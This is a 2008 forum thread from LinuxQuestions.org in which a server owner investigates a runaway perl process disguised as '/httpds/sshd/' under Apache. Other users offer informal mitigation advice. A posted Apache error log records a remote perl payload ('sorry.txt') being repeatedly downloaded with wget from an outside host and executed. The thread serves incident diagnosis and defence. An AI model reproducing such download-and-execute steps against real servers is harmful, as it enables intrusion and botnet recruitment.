LinuxQuestions.org
Visit Jeremy's Blog.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Server
User Name
Password
Linux - Server This forum is for the discussion of Linux Software used in a server related context.

Notices

Reply
 
Search this Thread
Old 01-09-2008, 11:24 AM   #1
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Rep: Reputation: 0
Perl eating CPU Time - what is "/httpds/sshd/"


Hi All,

Since few weeks my server slooooow down sometimes and when I log me in via SSH I can see that the perl process eating CPU time. The only one solution is too kill those processes one after another (because it resurrect )

I see that this process has been started by Apache so I'm afraid that it could be hack attempt.

Code:
# top
13599 apache    25   0  5088 2868 1200 R 97.1  0.3  27:36.12 perl
Code:
#ps aux | grep 13599
apache   13599 52.0  0.2   5088  2868 ?        R    14:27  27:44 /httpds/sshd/
Could someone tell me what "/httpds/sshd/" is?

I use ssh and sftp instantly.
I have already disabled the apache perl module.
The OS is: Fedora Core 5 2.6.20-1.2320.fc5
Apache: 2.2.2
PHP: 5.1.6

Any help is very appreciated :-)

Best Regards,
Neo
 
Old 01-09-2008, 11:29 AM   #2
trickykid
Guru
 
Registered: Jan 2001
Posts: 24,133

Rep: Reputation: 197Reputation: 197
perl doesn't run like that unless a user most likely runs a script, etc. Sounds to me like you possibly got hacked. I'd say you may want to unplug this machine from the network to do a full investigation. Unless you have something with apache that kicks off a perl script/program, etc.
 
Old 01-09-2008, 01:54 PM   #3
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Original Poster
Rep: Reputation: 0
The problem is I cannot unplug this machine because this is leased root server

I saw that webmin starts also some perl processes but they not causing this problem I think.

How can I found who starts this processes and what is "/httpds/sshd/"

I'm trying to be very carefully with this server. No root access, complicated password, I check regularly the logfiles but I didn't saw something suspect
 
Old 01-09-2008, 05:11 PM   #4
trickykid
Guru
 
Registered: Jan 2001
Posts: 24,133

Rep: Reputation: 197Reputation: 197
Leased root server? I'd suggest asking the people you lease it from then. But seriously, if there are processes you don't know about or how they start and you are in full control of this server, better start asking questions to your provider.

httpds/sshd sounds to me like some type of web enabled ssh program I would guess. That's why I'd suggest asking the lease provider. Most likely this server of yours could just be a virtual server and they might have programs running to monitor, applications you may not want running, etc.
 
Old 01-09-2008, 11:24 PM   #5
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Original Poster
Rep: Reputation: 0
I cannot ask my provider because this is a root server. So this mean I have a physical server in theirs server room. But this is my server, it's not virtual. So this mean that they does not installed any programs there and only support is for hardware or networks connection.

Regards,
Neo
 
Old 01-10-2008, 01:45 AM   #6
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Original Poster
Rep: Reputation: 0
It seems to be hack attempt. I saw this in my general apache error logfile:

Code:
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 13685  100 13685    0     0   2267      0  0:00:06  0:00:06 --:--:-- 35000
sh: line 1: 13589 Killed                  perl sorry.txt
--14:27:07--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

     0K .......... ...                                        100% 37.4K=0.4s

14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]

sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
--15:20:31--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

     0K .......... ...                                        100% 34.6K=0.4s

15:20:33 (34.6 KB/s) - `sorry.txt' saved [13685/13685]

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 13685  100 13685    0     0  16702      0 --:--:-- --:--:-- --:--:-- 32962
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
Can't open perl script "sorry.txt": No such file or directory
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [error] [client 208.186.169.183] File does not exist: /var/www/sigsiu/html/ebay/zenphoto
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
I think that it does not work. But how it is possible if apache perl module is disabled?
 
Old 02-02-2008, 08:29 AM   #7
Promethyl
LQ Newbie
 
Registered: Feb 2008
Posts: 1

Rep: Reputation: 0
Well, I would start by renaming perl to perl2 and killing the processes. (Temporary.)

Then, put in hosts entries for the IRC servers it uses, so it can't communicate out.

It has a list of ports it scans, I would also AFP block any of those which aren't in use legitimately.

A lot of it is in Spanish, so it's unclear.

Now, I would look for how it got there in the first place. Uploaded by user? That part I've shaky on.
 
  


Reply

Tags
apache, cpu, perl


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
kacpid eating cpu 99% cpu time! tjclancy Linux - Software 13 09-19-2011 03:08 PM
Generate alert with "CPU load average" "CPU utilization" viky Linux - Hardware 3 07-25-2007 04:24 AM
Alert used "cpu load" and "cpu utilization" viky General 0 07-23-2007 03:19 AM
problem "make"ing gtk+ "/usr/bin/env: perl -w" caid Linux - Newbie 8 07-29-2005 04:51 AM
"Real time" Apache log filtering with Perl skelly Programming 1 07-01-2004 02:24 PM


All times are GMT -5. The time now is 11:05 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration